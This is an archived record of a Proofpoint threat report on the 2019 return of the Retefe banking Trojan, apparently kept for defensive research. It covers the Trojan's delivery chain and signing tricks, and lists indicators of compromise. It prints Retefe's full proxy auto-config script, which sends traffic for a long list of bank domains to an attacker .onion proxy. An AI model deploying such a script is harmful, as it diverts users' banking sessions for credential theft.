{
	"id": "8d0dbf90-b33c-4eec-90ef-a9ac866747df",
	"created_at": "2026-04-06T00:14:29.825288Z",
	"updated_at": "2026-04-10T03:20:34.072544Z",
	"deleted_at": null,
	"sha1_hash": "6f17c1a9cbff9c230c78b56d72b853cfd3f8db50",
	"title": "2019: The Return of Retefe | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1462286,
	"plain_text": "2019: The Return of Retefe | Proofpoint US\r\nBy Bryan Campbell and the Proofpoint Threat Insight Team, May 02, 2019\r\nPublished: 2019-05-02 · Archived: 2026-04-05 14:57:38 UTC\r\nOverview\r\nRetefe is a banking Trojan that historically has routed online banking traffic intended for targeted banks through a\r\nproxy instead of the web injects more typical of other bankers. In the past, Retefe campaigns have targeted\r\nAustria, Sweden, and Switzerland, among other regions, such as users of UK online banking sites. Retefe is\r\ngenerally delivered via zipped JavaScript as well as Microsoft Word documents [1].\r\nAlthough Retefe only appeared infrequently in 2018, the banker returned to more regular attacks on Swiss and\r\nGerman victims in April of 2019 with both a Windows and macOS version.\r\nRetefe’s return to the landscape was marked by several noteworthy changes:\r\nUsing stunnel instead of TOR to secure its proxy redirection and command and control communications\r\nThe use of Smoke Loader rather than sLoad as an intermediate loader\r\nThe abuse of a shareware application known as “Convert PDF to Word Plus 1.0”; this is a Python script\r\nthat has been packaged as an executable using PyInstaller and packed into an archive using the UPX\r\npacking engine.\r\nAbused Shareware as Part of the Retefe Installation Stack\r\nProofpoint researchers identified the abused shareware application in a public malware repository in March 2019.\r\nIt originates from http://lettercreate.com/unipdf/convert-pdf-to-word-plus[.]exe and uses a certificate issued by\r\nDigiCert.\r\nThe certificate subject is “BULDOK LIMITED/emailAddress=admin@buldoklimited[.]info”.\r\nFigure 1 shows the resulting Python code once the executable has been unpacked, unpackaged, and decompiled.\r\nhttps://www.proofpoint.com/us/threat-insight/post/2019-return-retefe\r\nPage 1 of 10\n\nFigure 1: Resulting Python code when convert-pdf-to-word-plus.exe is unpacked, unpackaged, and decompiled.\r\nThe Python 
script writes two files named convert-pdf-to-word-plus.exe and convert-pdf-to-word-plus_driver.exe\r\nto the %TEMP% directory and executes them.\r\nWe currently believe that the convert-pdf-to-word-plus.exe file is a legitimate installer for the “Convert PDF to\r\nWord Plus” application (Figure 2) and is executed as a decoy.\r\nFigure 2: Convert PDF to Word Plus Installer\r\nConvert-pdf-to-word-plus_driver.exe, on the other hand, is malicious and is Retefe’s loader. As can be seen in\r\nFigure 3, the loader extracts 7-Zip and stunnel from its resources, then decrypts and executes the main Retefe\r\nJavaScript code.\r\nFigure 3: Retefe Loader\r\nAs shown in the figure above, Retefe extracts stunnel from a compressed archive in place of the usual TOR Socat\r\nproxy. Along with the decoy shareware and the use of Smoke Loader, this is the most significant observed change to\r\nRetefe’s behavior.\r\nSmoke Loader Now Bootstraps Retefe\r\nOn April 17, Proofpoint researchers observed a geographically targeted campaign against Switzerland using the\r\nemail lure below (Fig. 4). 
This campaign used an Object Linking and Embedding (OLE) package to deliver\r\nSmoke Loader.\r\nApproximately two hours following infection, we observed Smoke Loader downloading Retefe with the following\r\nhash:\r\n925ce9575622c59baacc70c0593a458a76731c5f195c6a7a790abc374402725e\r\nFigure 4: Lure document used to drop Smoke Loader, which in turn downloads Retefe\r\nA copy of the Retefe dropper PowerShell script can be downloaded here for further analysis:\r\nhttps://github.com/EmergingThreats/threatresearch/blob/master/retefe/retefedropperapr2019\r\nThis script contains the content required for Retefe persistence, including the scheduled tasks for 7-Zip and the\r\nstunnel secure tunneling software.\r\nSecure Tunneling (stunnel) Replaces Tor\r\nIt is not clear why Retefe’s authors have now deprecated Tor in favor of stunnel. However, we suspect that the use\r\nof a dedicated tunnel rather than Tor makes for a more secure connection because it eliminates the possibility of\r\nsnooping on the hops between Tor nodes. Tor is also a “noisier” protocol and thus would be easier to detect in an\r\nenterprise environment than stunnel, which would appear as any other outbound SSL connection.\r\nProxy Information From the Retefe Binary\r\nBelow is a portion of the proxy configuration that lists the online banking sites whose users are targeted by this\r\ninstance of Retefe. 
The complete proxy configuration is in the appendix.\r\nfunction FindProxyForURL(url, host) {\r\n var proxy = \"PROXY ltro3fxssy7xsqgz.onion:5588;\";\r\n var hosts = new Array('cs.directnet.com', '*akb.ch', '*ubs.com', '*bkb.ch', '*lukb.ch', '*zkb.ch',\r\n '*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch', '*bcge.ch', .\r\n.\r\n.\r\n.\r\n'*volksbank.li', '*bendura.li', '*lgt.com', '*retefe*.ch', '*mirabaud.lu');\r\n for (var i = 0; i \u003c hosts.length; i++) {\r\n if (shExpMatch(host, hosts[i])) {\r\n return proxy\r\n }\r\n }\r\n return\r\n}\r\nMalware Masquerading as Adobe Installer Applications\r\nFigure 5: macOS Adobe Cloud installer\r\nUnlike the Retefe campaigns targeting Microsoft Windows hosts, which stopped in December 2018, campaigns targeting\r\nmacOS have continued throughout the first several months of 2019. These campaigns continued to use developer-signed versions of fake Adobe Installers in order to deliver their payloads.\r\nBelow is the signature used to sign the Retefe binary. By using signed binaries, actors attempt to bypass the\r\nmacOS internal Gatekeeper security application, which checks if applications are signed by a valid developer\r\ncertificate before running. 
The output was created by running the command codesign -dv --verbose=4 on the\r\ninstaller binary.\r\nIdentifier=Ryan_Ltd.Software\r\nFormat=app bundle with Mach-O thin (x86_64)\r\nCodeDirectory v=20200 size=341 flags=0x0(none) hashes=10+3 location=embedded\r\nOSPlatform=36\r\nOSSDKVersion=657920\r\nOSVersionMin=657664\r\nHash type=sha1 size=20\r\nCandidateCDHash sha1=f839edca246ddf3881cb3f2821a900b252330a59\r\nHash choices=sha1\r\nPage size=4096\r\nCDHash=f839edca246ddf3881cb3f2821a900b252330a59\r\nSignature size=8525\r\nAuthority=Developer ID Application: Oleg Kosourov (Q9HZ55M855)\r\nAuthority=Developer ID Certification Authority\r\nAuthority=Apple Root CA\r\nTimestamp=Jan 21, 2019, 3:43:51 AM\r\nInfo.plist entries=23\r\nTeamIdentifier=Q9HZ55M855\r\nSealed Resources version=2 rules=12 files=5\r\nInternal requirements count=1 size=180\r\nGatekeeper enforces application integrity by checking the validity of the Developer ID associated with an\r\napplication. When an app is created, it is digitally signed with a certificate and the associated name of the\r\ndeveloper. The notarization status verifies the application is from the identified developer and has not been\r\nchanged. Further changes by Apple in macOS Mojave include app notarization, an additional integrity check for\r\nthe signed application [2].\r\nConclusion\r\nRetefe is unusual in its use of proxies to redirect victims to fake bank pages for credential theft instead of\r\nemploying web injects for man-in-the-browser attacks like most banking Trojans. 
After a fairly lengthy absence from the landscape, its developers appear to have\r\nupdated key features of the Trojan and are employing new distribution mechanisms, including fake apps and\r\na switch to Smoke Loader as the intermediate downloader.\r\nRetefe in particular is noted for changing its proxy configuration, having previously used Proxifier and in 2019\r\nmoving to stunnel. As with many types of malware, its developers continue to innovate, identifying new, more\r\neffective ways to infect victims and steal personal information to better monetize their attacks.\r\nReferences\r\n[1] https://www.govcert.admin.ch/blog/33/the-retefe-saga\r\n[2] https://support.apple.com/en-us/HT202491\r\nAcknowledgment\r\nSpecial thanks to @JaromirHorejsi for assistance sourcing samples of Retefe.\r\nIndicators of Compromise (IOCs)\r\nIOC | IOC Type | Description\r\n3d9bd35cc82712e3ec02ccb561633c8ab130348ffae259a35edf927e9c770052 | SHA256 | Fake convert-pdf-to-word-plus.exe\r\n4415cc989396ae301d103d11dd3aa7c90cbf9fb3a7aa49113a410efab8edebe3 | SHA256 | Legitimate convert-pdf-to-word-plus.exe\r\ndcb9ceeedfeb1b5a19f8898cd7c3be8f2afda9ad2ee3afaf12e65c0c07783c8b | SHA256 | Retefe Loader (convert-pdf-to-word-plus_driver.exe)\r\n6750c9224540d7606d3c82c7641f49147c1b3fd0 | Certificate Hash | DigiCert Certificate\r\n[20 SHA256 hashes, see source PDF] | SHA256 | macOS dmg files masquerading as Adobe installer\r\nhxxp://lettercreate.com/unipdf/convert-pdf-to-word-plus.exe | URL | Backdoored application\r\n925ce9575622c59baacc70c0593a458a76731c5f195c6a7a790abc374402725e | SHA256 | Smoke Loader downloaded Retefe\r\na75986c65170c28e5306673fd117c8e47b186895054b6f2681146c09d3f0d107 | 
SHA256 | SmokeLoader Document\r\nhxxp://www.laserowakasia.pl/wp-rss[.]php\r\nhxxp://racyroyalcoin.com/wp-rss[.]php\r\nhxxp://bizbhutanevents.com/wp-rss[.]php\r\nhxxp://www.kjkpropertysolutions.com/wp-rss[.]php\r\nhxxp://thealtilium.com/wp-rss[.]php | urls | SmokeLoader c2\r\ne53a9b2a484a052fc47df2a499bf942d350f052054ae9a67bdcc13f46c3d9c5b | SHA256 | SmokeLoader\r\nET and ETPRO Suricata/Snort Signatures\r\n2835551 ETPRO TROJAN Observed SmokeLoader Style Connectivity Check\r\n2022130 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Retefe CnC)\r\nAppendix\r\nFull proxy configuration\r\nfunction FindProxyForURL(url, host) {\r\n var proxy = \"PROXY ltro3fxssy7xsqgz.onion:5588;\";\r\nvar hosts = new Array('cs.directnet.com', '*akb.ch', '*ubs.com', '*bkb.ch', '*lukb.ch', '*zkb.ch'\r\n'*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch', '*bcge.ch', '*credit-suisse.com', '*.clientis.ch',\r\n'clientis.ch', '*bcvs.ch', '*.cic.ch', 'cic.ch', 'ukb.ch', '*.ukb.ch', 'urkb.ch', '*.urkb.ch',\r\n'*eek.ch','*szkb.ch', '*shkb.ch', '*glkb.ch', '*nkb.ch', '*owkb.ch', '*cash.ch', '*bcf.ch',\r\n'*bcv.ch', '*juliusbaer.com', '*abs.ch', '*bcn.ch', '*blkb.ch', '*bcj.ch', '*zuercherlandbank.ch',\r\n'*bankthalwil.ch', '*piguetgalland.ch', '*inlinea.ch', '*bernerlandbank.ch', '*bancasempione.ch',\r\n'*bsibank.com', '*corneronline.ch', '*vermoegenszentrum.ch', '*gobanking.ch', '*slbucheggberg.ch',\r\n'*slfrutigen.ch', '*hypobank.ch', '*regiobank.ch', '*rbm.ch', '*ersparniskasse.ch', '*ekr.ch',\r\n'*sparkasse-dielsdorf.ch', '*.eki.ch', '*bankgantrisch.ch', '*bbobank.ch', '*alpharheintalbank.ch',\r\n'*aekbank.ch', '*acrevis.ch', '*credinvest.ch', '*zarattinibank.ch', '*appkb.ch', '*arabbank.ch',\r\n'*apbank.ch', '*bankbiz.ch', '*bankleerau.ch', '*btv3banken.ch', '*dcbank.ch', '*bordier.com',\r\n'*banquethaler.com', '*bankzimmerberg.ch', '*bbva.ch', '*bankhaus-jungholz.ch', '*sparhafen.ch',\r\n'*banquecramer.ch', '*banqueduleman.ch', '*ebankingch.bcp.bank', '*bil.com', '*vontobel.com',\r\n'*pbgate.net', '*bnpparibas.com', '*ceanet.ch', '*ce-riviera.ch', '*cedc.ch', '*cmvsa.ch',\r\n'*ekaffoltern.ch', '*glarner-regionalbank.ch', '*cen.ch', '*cbhbank.com', '*coutts.com',\r\n'*cimbanque.net', '*commerzbank.com', '*dominickco.ch', '*efginternational.com', '*falconpb.com',\r\n'*gemeinschaftsbank.ch', '*frankfurter-bankgesellschaft.com', '*globalance-bank.com', '*ca-nextbank.c\r\n'*hsbcprivatebank.com', '*leihkasse-stammheim.ch', '*incorebank.ch', '*lienhardt.ch', '*maerki-bauman\r\n'*mirabaud.com', '*pbihag.ch', '*rahnbodmer.ch', '*mybancaria.ch', '*reyl.com', '*saanenbank.ch',\r\n'*sebgroup.com', '*slguerbetal.ch', '*bankslm.ch', '*neuehelvetischebank.ch', '*slr.ch', '*slwynigen\r\n'*sparkasse.ch', '*umtb.ch', '*trafina.ch', '*ubp.com', 'direct.directnet.com', '*tkb.ch',\r\n'onlinebanking.directnet.com', 'onlinebanking.nab.ch', 'onlinebankingbusiness.nab.ch', '*cler.ch',\r\n'mabanque.bnpparibas', '*llb.li', '*bankfrick.li', '*vpbank.com', '*bankalpinum.com', '*unionbankag.c\r\n'*neuebankag.li', '*raiffeisen.li', '*volksbank.li', '*bendura.li', '*lgt.com', '*retefe*.ch', '*mira\r\n for (var i = 0; i \u003c hosts.length; i++) {\r\n if (shExpMatch(host, hosts[i])) {\r\n return proxy\r\n }\r\n }\r\n return\r\nSource: https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe"
	],
	"report_names": [
		"2019-return-retefe"
	],
	"threat_actors": [],
	"ts_created_at": 1775434469,
	"ts_updated_at": 1775791234,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6f17c1a9cbff9c230c78b56d72b853cfd3f8db50.pdf",
		"text": "https://archive.orkl.eu/6f17c1a9cbff9c230c78b56d72b853cfd3f8db50.txt",
		"img": "https://archive.orkl.eu/6f17c1a9cbff9c230c78b56d72b853cfd3f8db50.jpg"
	}
}